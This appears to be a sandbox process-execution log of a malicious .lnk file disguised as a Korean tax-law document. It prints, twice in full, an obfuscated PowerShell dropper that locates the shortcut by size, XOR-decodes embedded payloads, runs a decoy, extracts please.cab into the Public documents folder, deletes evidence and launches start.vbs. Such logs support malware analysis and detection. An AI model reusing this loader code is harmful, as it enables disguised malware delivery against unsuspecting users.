cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IWzFgieEMMVP" "C:\Users\test22\AppData\Local\Temp\소명자료 목록(국세징수법 시행규칙).hwp.lnk"
2052cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation*0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford*0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) | <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;") )
2180cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
2288cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
2348findstr.exe findstr /i rshell.exe
2384powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function oxidation{param($twenty); <#prosperity near#>$nurse = $twenty.substring(0,$twenty.length-4) + ''; <#clearing opponent#>return $nurse;};function boarding{param($malicious);<#adequate giving#> remove-item <#five mortify#> -path $malicious <#alphabet figured#> -force;};function waste{param($doubtful,$scarlet,$vocation,$emperor,$reply);<#variation flat#> $prayer=New-Object System.IO.FileStream(<#million argument#>$doubtful,<#porcelain excessive#>[System.IO.FileMode]::Open,<#gossip accuracy#>[System.IO.FileAccess]::Read);<#hastily preface#> $prayer.Seek(<#messenger brown#>$scarlet,[System.IO.SeekOrigin]::Begin);<#alarm honey#> $continent=$vocation*0x01;<#count popular#> $forked=New-Object byte[] <#supported baptism#>$vocation; <#slope latter#> $verge=New-Object byte[] <#designation crush#>$continent; <#pendent pushing#>$prayer.Read(<#horse temperate#>$verge,0,<#ready clumsy#>$continent); $prayer.Close();$afford=0;while($afford -lt $vocation){<#indicate inference#>$forked[$afford]=$verge[$afford*0x01] -bxor $emperor;$afford++;}<#scramble sect#> set-content $reply <#forbid wreath#> $forked -Encoding <#confused renew#> Byte;};function back{param($intelligence, $continued);<#succeed fast#> expand $intelligence <#fortify respiration#> -F:* $continued;};function defense{$triangle = $env:public<#above critical#> + '\' +<#straddle pound#> 'docu'+'me'+'nts';<#policy distinction#> return $triangle;};function prophecy{param($fasten); <#official obscene#>$street = Split-Path $fasten;<#preference technical#> return $street;};function steep{return Get-Location;};function decoration{<#undue wreck#>return $env:Temp;};function sometimes{$forehead = steep; $doublet = sever -century $forehead; <#again coarse#>if($doublet.length -eq 0) {$forehead = decoration; <#quadrant mechanical#>$doublet = sever -century $forehead;} return $doublet;};function collective{$chastity = $env:public<#remedy rubbish#> + '\' + 'ple'+'ase.'+'cab';<#bargain decline#> return $chastity;};function easily{$mood = $env:public<#melting coin#>+'\do'+'cume'+'nts'+'\s'+'ta'+'rt.v'+'bs';<#wagon composing#> return $mood;};function sever{param($century); <#compare studious#> $rudder=''; [System.IO.Directory]::GetFiles($century, '*.'+'ln'+'k', [System.IO.SearchOption]::AllDirectories) | <#disgust solemn#>ForEach-Object { <#plaintiff widow#> $fifth = [System.IO.FileInfo]::new($_); <#ashes pick#> if ($fifth.Length -eq 0x0016050F) { <#eloquence camphor#> $rudder = $fifth.FullName;}}; return <#spongy disturbance#> $rudder;};$charitable = sometimes;<#sign soil#>$tremulous = prophecy -fasten $charitable;<#tilt bowsprit#> $possible = oxidation -twenty $charitable;waste -doubtful <#minor segment#> $charitable -scarlet <#essay neuter#> 0x00002134 -vocation 0x00006C00 -emperor <#juice season#> 0x2B -reply <#integral valve#> $possible;<#working turkish#> & $possible;$breach=collective;<#ready reclaim#>waste -doubtful <#lightning lathe#> $charitable -scarlet <#latitude removal#> 0x00008D34 -vocation <#flatter marshal#> 0x00013CDA -emperor <#vowel abundant#> 0x72 -reply <#extensive spirited#> $breach;<#lover forest#>boarding -malicious $charitable;$coffee = defense;<#near afford#>back -intelligence $breach -continued <#consult abnormal#>$coffee;<#hydrate nail#>boarding -malicious $breach;$tube = <#reservoir bark#>easily;<#republic turbulent#>& $tube;"
2436expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\please.cab -F:* C:\Users\Public\documents
2584